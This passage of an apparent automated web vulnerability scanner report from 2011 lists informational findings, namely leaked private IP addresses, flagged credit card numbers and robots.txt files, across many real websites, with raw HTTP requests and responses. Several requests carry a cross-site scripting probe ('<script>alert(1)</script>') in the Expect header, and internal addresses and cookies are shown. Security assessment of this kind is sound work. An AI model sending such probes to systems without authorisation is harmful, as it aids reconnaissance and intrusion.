The following RFC 1918 IP address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gohawaii.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Set-Cookie: ARPT=XKQRVMS192.168.10.48CKMLW; path=/
Date: Sun, 01 May 2011 23:49:22 GMT
Server: Apache/2.0.52 (Red Hat)
Content-Length: 472
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...
28.12. http://www.google.com/sdch/rU20-FBA.dct  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /sdch/rU20-FBA.dct

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /sdch/rU20-FBA.dct HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7; NID=46=LumMfILOIubaQ6V3uwnnVHHmx_iWhkqmohHaboUow34NxpZ86tcfWJvUvQuPDaP0OZyKgDOICC-8iGxYmEZ47u1HHIyvJoNYeQNCiphbG7hdYNAS6A3bBKjfIijcHZ_F
If-Modified-Since: Sat, 30 Apr 2011 20:13:54 GMT

Response

HTTP/1.1 200 OK
Content-Type: application/x-sdch-dictionary
Last-Modified: Mon, 02 May 2011 00:49:42 GMT
Date: Mon, 02 May 2011 02:04:43 GMT
Expires: Mon, 02 May 2011 02:04:43 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 96018

Domain: .google.com
Path: /search

<!doctype html><head><title>used car<!doctype html><head><title>direct - Google Search</title><script>window.google={kEI:" WJ_5AK2N-RqwM",kEXPI:"25907,2
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: &hl=en&ct=clnk&gl=us&source=www.google.com','','','',' &amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','1','','0C
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: mXEkS0TMcmsJ:www.edmunds.com/used-cars/+used+car &amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','1','','0CD
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache:J:explore.live.com/windows-live- onmousedown="return clk(this.href,'','','',' gQqwMoA </a>
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache:J:www.thecarconnection.com/make/new,J:www.motortrend.com/new_cars/01/y4a-lQGHU2cJ:www.vehix.com/+used+car5Ke98xsxxpYJ:www.whitepages.com/person+ &amp;hl=en&amp;ct=clnk&amp;
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: contact_us+direct en.wikipedia.org/wiki/DirecTV+direct onmousedown="return clk(this.href,'','','',' 2','','0CD')">
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: www.carsdirect.com/used_cars/search this.href,'','','','1','','0C directv.com/DTVAPP/content/My_Account OsWJ_5AK2N-RqwM&amp;ved=0CH </a>
...[SNIP]...
<a href="/search?hl=en&amp;q=http://172.31.196.197:8888/search?q=cache: &amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','',' 7','','0C ')">
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache:yTixchY6gV0J:www.dish-television.com/+direct rZQjSq2ux10J:translate.reference.com/+ &amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: this.href,'','','',' ')">
...[SNIP]...
28.13. http://www.homebusinessconnection.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.homebusinessconnection.com
Path:   /favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.homebusinessconnection.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Server: Varnish
X-Varnish: 396950468
Retry-After: 0
X-Cache: MISS
Content-Type: text/html; charset=utf-8
Date: Sun, 01 May 2011 23:16:24 GMT
Via: 1.1 varnish 172.17.2.157
Connection: Keep-Alive
Age: 0
Content-Length: 484


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>417 Expectation Failed
...[SNIP]...
28.14. http://www.latinamericancupid.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.latinamericancupid.com
Path:   /favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.latinamericancupid.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Length: 0
Server: Microsoft-IIS/6.0
NLBServer: 192.168.164.18;
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:55:11 GMT

28.15. http://www.mochigames.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mochigames.com
Path:   /favicon.ico

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mochigames.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: nginx/0.8.52
Date: Mon, 02 May 2011 00:50:28 GMT
Content-Type: image/x-icon
Content-Length: 1150
Last-Modified: Wed, 18 Aug 2010 01:49:13 GMT
Connection: keep-alive
P3P: policyref="http://www.mochimedia.com/p3p/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
X-Permitted-Cross-Domain-Policies: master-only
User-Header: X-Permitted-Cross-Domain-Policies: master-only
X-MochiAds-Server: 38.102.129.15:80
Accept-Ranges: bytes
X-Mochi-Backend: 10.0.0.113:40043
X-Mochi-Source: 10.0.0.235:35658

............ .h.......(....... ..... ........................................................................................................gaaa.RRR.SSS.UUU.SSS.RRR.SSS.jjj....W....................ll
...[SNIP]...
28.16. http://www.nflgridirongab.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nflgridirongab.com
Path:   /favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.nflgridirongab.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Server: Varnish
X-Varnish: 2136373459
Retry-After: 0
X-Cache: MISS
Content-Type: text/html; charset=utf-8
Date: Sun, 01 May 2011 23:45:08 GMT
Via: 1.1 varnish 172.17.2.192
Connection: Keep-Alive
Age: 0
Content-Length: 485


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>417 Expectation Failed
...[SNIP]...
28.17. http://www.onlocationvacations.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.onlocationvacations.com
Path:   /favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.onlocationvacations.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Server: Varnish
X-Varnish: 325720725
Retry-After: 0
X-Cache: MISS
Content-Type: text/html; charset=utf-8
Date: Mon, 02 May 2011 00:52:41 GMT
Via: 1.1 varnish 172.17.34.106
Connection: Keep-Alive
Age: 0
Content-Length: 484


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>417 Expectation Failed
...[SNIP]...
28.18. http://www.searchcactus.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.searchcactus.com
Path:   /favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.searchcactus.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=IMQQWQS10.10.10.2CKKIL; path=/
Server: Microsoft-IIS/5.0
Set-Cookie: serverid=scweb1
P3P: CP="IDC COR CUR OUR STP"
Date: Sun, 01 May 2011 23:26:39 GMT
Content-Type: image/x-icon
Accept-Ranges: bytes
Last-Modified: Mon, 12 Jun 2000 23:51:00 GMT
ETag: "0ca4efc9d4bf1:141c"
Content-Length: 318

..............(.......(....... ........................................................................................................................p......................p.....0...;..0..........
...[SNIP]...
28.19. http://www.sunshinereview.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sunshinereview.org
Path:   /favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.sunshinereview.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Server: Varnish
X-Varnish: 1851422213
Retry-After: 0
X-Cache: MISS
Content-Type: text/html; charset=utf-8
Date: Mon, 02 May 2011 00:25:56 GMT
Via: 1.1 varnish 172.17.3.164
Connection: Keep-Alive
Age: 0
Content-Length: 485


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>417 Expectation Failed
...[SNIP]...
28.20. http://www.sweepsadvantage.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sweepsadvantage.com
Path:   /favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.sweepsadvantage.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Server: Varnish
X-Varnish: 586451040
Retry-After: 0
X-Cache: MISS
Content-Type: text/html; charset=utf-8
Date: Mon, 02 May 2011 00:36:58 GMT
Via: 1.1 varnish 172.16.11.7
Connection: Keep-Alive
Age: 0
Content-Length: 484


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>417 Expectation Failed
...[SNIP]...
29. Credit card numbers disclosed  previous  next
There are 2 instances of this issue:

29.1. http://csrc.nist.gov/publications/nistpubs/800-40-Ver2/SP800-40v2.pdf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://csrc.nist.gov
Path:   /publications/nistpubs/800-40-Ver2/SP800-40v2.pdf

Issue detail

The following credit card numbers were disclosed in the response:

Request

GET /publications/nistpubs/800-40-Ver2/SP800-40v2.pdf HTTP/1.1
Host: csrc.nist.gov
Proxy-Connection: keep-alive
Referer: http://csrc.nist.gov/publications/nistpubs/800-40-Ver2/SP800-40v2.pdf
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Range: bytes=0-32767

Response

HTTP/1.1 206 Partial Content
Date: Sun, 01 May 2011 23:33:16 GMT
Server: Apache
Last-Modified: Fri, 03 Feb 2006 15:14:30 GMT
ETag: "82c001-1178ba-40be55ea30180"
Accept-Ranges: bytes
Content-Length: 32768
NIST: g3
Content-Range: bytes 0-32767/1145018
Content-Type: application/pdf

%PDF-1.3%....
10430 0 obj<</H[840 4431]/Linearized 1/E 26002/L 1145018/N 75/O 10438/T 936368>>endobj
xref
10430 26
0000000016 00000 n
0000005613 00000 n
0000000840 00000 n
00000059
...[SNIP]...
nt/Encoding/WinAnsiEncoding/BaseFont/Arial-BoldMT/FirstChar 32/LastChar 151/Subtype/TrueType/FontDescriptor 10442 0 R/Widths[278 0 0 0 0 0 722 0 333 333 0 0 278 333 278 278 556 556 556 556 556 556 556 556 556 556 0 0 0 0 0 0 0 722 722 722 722 667 611 778 722 278 0 0 611 833 722 778 667 0 722 667 611 722 667 944 0 0 0 0 0 0 0 0 0 556 611 556 611 556 333 611 611 278 278 556 278 889 611 611 611 0 389 556 333 611 556 778 556 55
...[SNIP]...
611 556 722 722 333 389 722 611 889 722 722 556 0 667 556 611 722 722 944 722 0 611 333 0 333 0 0 0 444 500 444 500 444 333 500 500 278 278 500 278 778 500 500 500 500 333 389 278 500 500 722 500 500 444 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 333 444 444 0 500 1000]>
...[SNIP]...
29.2. http://www.bing.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /search

Issue detail

The following credit card number was disclosed in the response:

Request

GET /search?q=vulnerability+management&go=&form=QBLH&qs=n&sk=&sc=8-0 HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110423; SRCHUID=V=2&GUID=D58F516F401B4DFBA034B7592B1777FD; _UR=; s_nr=1303567291710; s_vnum=1306159291712%26vn%3D2; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; countrycode=US; zipcode=75207; _HOP=; RMS=F=GgAg&A=AAAAAAAAAAAQ; _SS=SID=54196B2489E649DC9D985351F7EDDDA0&CW=983&CH=903&bIm=926; SRCHD=MS=1752452&SM=1&D=1740336&AF=NOFORM; MUID=B506C07761D7465D924574124E3C14DF

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Sun, 01 May 2011 23:32:44 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 54088

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h
...[SNIP]...
<a class="sa_cpt" u="6|1060|4591212860736857|fe671ba9,a768d0cc">
...[SNIP]...
30. Robots.txt file  previous  next
There are 476 instances of this issue:

30.1. http://0.gravatar.com/avatar/a76bb4a499349279e0339b78885213c6  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://0.gravatar.com
Path:   /avatar/a76bb4a499349279e0339b78885213c6

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: 0.gravatar.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=300
Content-Type: text/plain
Date: Mon, 02 May 2011 02:47:03 GMT
Expires: Mon, 02 May 2011 02:52:03 GMT
Last-Modified: Tue, 18 Jan 2011 12:04:24 GMT
Server: ECS (dca/5339)
X-Cache: HIT
Content-Length: 99
Connection: close

User-Agent: *
Disallow: /*.json
Disallow: /*.xml
Disallow: /*.php
Disallow: /*.vcf
Disallow: /*.qr
30.2. http://0.r.msn.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://0.r.msn.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: 0.r.msn.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=2147483647
Content-Type: text/plain
Last-Modified: Tue, 15 Sep 2009 18:04:58 GMT
Accept-Ranges: bytes
ETag: "455b9d92f36ca1:0"
Server: Microsoft-IIS/7.5
p3p: CP=BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo
Date: Sun, 01 May 2011 23:32:50 GMT
Connection: close
Content-Length: 26

User-agent: *
Disallow: /
30.3. http://1.gravatar.com/avatar/31345061262d8fde4fa5256164900115  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://1.gravatar.com
Path:   /avatar/31345061262d8fde4fa5256164900115

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: 1.gravatar.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=300
Content-Type: text/plain
Date: Mon, 02 May 2011 02:48:11 GMT
Expires: Mon, 02 May 2011 02:53:11 GMT
Last-Modified: Tue, 18 Jan 2011 12:04:24 GMT
Server: ECS (dca/5339)
X-Cache: HIT
Content-Length: 99
Connection: close

User-Agent: *
Disallow: /*.json
Disallow: /*.xml
Disallow: /*.php
Disallow: /*.vcf
Disallow: /*.qr
30.4. http://1051679.r.msn.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://1051679.r.msn.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: 1051679.r.msn.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=2147483647
Content-Type: text/plain
Last-Modified: Tue, 15 Sep 2009 18:04:58 GMT
Accept-Ranges: bytes
ETag: "455b9d92f36ca1:0"
Server: Microsoft-IIS/7.5
p3p: CP=BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo
Date: Sun, 01 May 2011 23:34:13 GMT
Connection: close
Content-Length: 26

User-agent: *
Disallow: /
30.5. http://1188110.r.msn.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://1188110.r.msn.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: 1188110.r.msn.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=2147483647
Content-Type: text/plain
Last-Modified: Tue, 15 Sep 2009 18:04:58 GMT
Accept-Ranges: bytes
ETag: "455b9d92f36ca1:0"
Server: Microsoft-IIS/7.5
p3p: CP=BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo
Date: Sun, 01 May 2011 23:32:55 GMT
Connection: close
Content-Length: 26

User-agent: *
Disallow: /
30.6. http://ad.doubleclick.net/adi/N3382.Yahoo/B5116950.16  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3382.Yahoo/B5116950.16

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/plain
Content-Length: 101
Last-Modified: Thu, 18 Mar 2010 15:31:04 GMT
Date: Sun, 01 May 2011 23:33:33 GMT

User-Agent: AdsBot-Google
Disallow:

User-Agent: MSNPTC
Disallow:

User-agent: *
Disallow: /
30.7. http://ad.turn.com/server/pixel.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/pixel.htm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.turn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Date: Mon, 02 May 2011 02:20:08 GMT
Connection: close

User-agent: *
Disallow: /app
Disallow: /server
30.8. http://adx.g.doubleclick.net/pagead/adview  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adx.g.doubleclick.net
Path:   /pagead/adview

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: adx.g.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Mon, 02 May 2011 02:00:57 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block

User-Agent: *
Allow: /ads/preferences/
Disallow: /
Noindex: /
30.9. http://ajax.googleapis.com/ajax/static/modules/gviz/1.0/geomap/geomap.swf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ajax.googleapis.com
Path:   /ajax/static/modules/gviz/1.0/geomap/geomap.swf

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ajax.googleapis.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain; charset=UTF-8
Last-Modified: Mon, 23 Aug 2010 20:43:16 GMT
Date: Mon, 02 May 2011 02:29:15 GMT
Expires: Mon, 02 May 2011 02:29:15 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...
30.10. http://b.scorecardresearch.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 06 Jan 2010 17:35:59 GMT
Content-Length: 28
Content-Type: text/plain
Expires: Mon, 02 May 2011 23:34:41 GMT
Date: Sun, 01 May 2011 23:34:41 GMT
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

User-agent: *
Disallow: /
30.11. http://bs.serving-sys.com/BurstingPipe/adServer.bs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: bs.serving-sys.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Mon, 16 Jan 2006 20:19:44 GMT
Accept-Ranges: bytes
ETag: "0b02b30da1ac61:0"
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Mon, 02 May 2011 02:08:14 GMT
Connection: close
Content-Length: 28

User-agent: *
Disallow: /
30.12. http://c.statcounter.com/t.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c.statcounter.com
Path:   /t.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: c.statcounter.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:12:24 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 29 Sep 2010 14:41:23 GMT
ETag: "3d8800c-1a-49166f495eac0"
Accept-Ranges: bytes
Content-Length: 26
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow:
30.13. http://cdn.turn.com/server/ddc.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.turn.com
Path:   /server/ddc.htm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cdn.turn.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Cache-Control: private, no-cache, no-store, must-revalidate
Date: Mon, 02 May 2011 02:10:39 GMT
Content-Length: 47
Connection: close

User-agent: *
Disallow: /app
Disallow: /server
30.14. http://cm.g.doubleclick.net/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.g.doubleclick.net
Path:   /pixel

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cm.g.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Mon, 02 May 2011 01:57:16 GMT
Server: Cookie Matcher
Cache-Control: private
X-XSS-Protection: 1; mode=block

User-Agent: *
Disallow: /
Noindex: /
30.15. http://csrc.nist.gov/publications/nistpubs/800-40-Ver2/SP800-40v2.pdf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://csrc.nist.gov
Path:   /publications/nistpubs/800-40-Ver2/SP800-40v2.pdf

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: csrc.nist.gov

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:33:29 GMT
Server: Apache
Last-Modified: Fri, 28 May 1999 13:23:27 GMT
ETag: "20dc40b-97-34beb0b2c91c0"
Accept-Ranges: bytes
Content-Length: 151
NIST: g3
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin
Disallow: /icons
Disallow: /images
Disallow: /rskforum/latest
Disallow: /virus/virusl/latest
Disallow: /virusl/latest
30.16. http://d.chango.com/m/s/AdBrite  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.chango.com
Path:   /m/s/AdBrite

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: d.chango.com

Response

HTTP/1.0 200 OK
Content-Length: 25
Server: Chango RTB Server
Last-Modified: Wed, 02 Mar 2011 15:52:04 GMT
Etag: "d8d4e537fbe8b5596b7ccb406a5b59efdf4b7d1d"
Cache-Control: public
Content-Type: text/plain

User-agent: *
Disallow: /
30.17. http://d1.openx.org/afr.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d1.openx.org
Path:   /afr.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: d1.openx.org

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:07:47 GMT
Server: Apache
Last-Modified: Tue, 31 Aug 2010 01:04:36 GMT
ETag: "68cc3-131-48f142a249100"
Accept-Ranges: bytes
Content-Length: 305
Connection: close
Content-Type: text/plain; charset=UTF-8

# This robots.txt file requests that search engines and other
# automated web-agents don't try to index the files in this
# directory (/www/delivery/). This file is required in the
# event that you us
...[SNIP]...
30.18. http://digg.com/tools/diggthis.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://digg.com
Path:   /tools/diggthis.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: digg.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:43:41 GMT
Server: Apache
Last-Modified: Tue, 26 Apr 2011 18:18:43 GMT
Accept-Ranges: bytes
Content-Length: 509
Vary: Accept-Encoding
X-Digg-Time: D=310 (null)
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Keep-Alive: timeout=5, max=9997
Connection: Keep-Alive
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /ad/*
Disallow: /ajax/*
Disallow: /error/*
Disallow: /onboard/*
Disallow: /saved
Disallow: /settings
Disallow: /settings/*
Disallow: /news/*/v/*
Disallow: /verification/*

User
...[SNIP]...
30.19. http://ds.serving-sys.com/BurstingCachedScripts//SBTemplates_2_2_7/StdBanner.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ds.serving-sys.com
Path:   /BurstingCachedScripts//SBTemplates_2_2_7/StdBanner.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
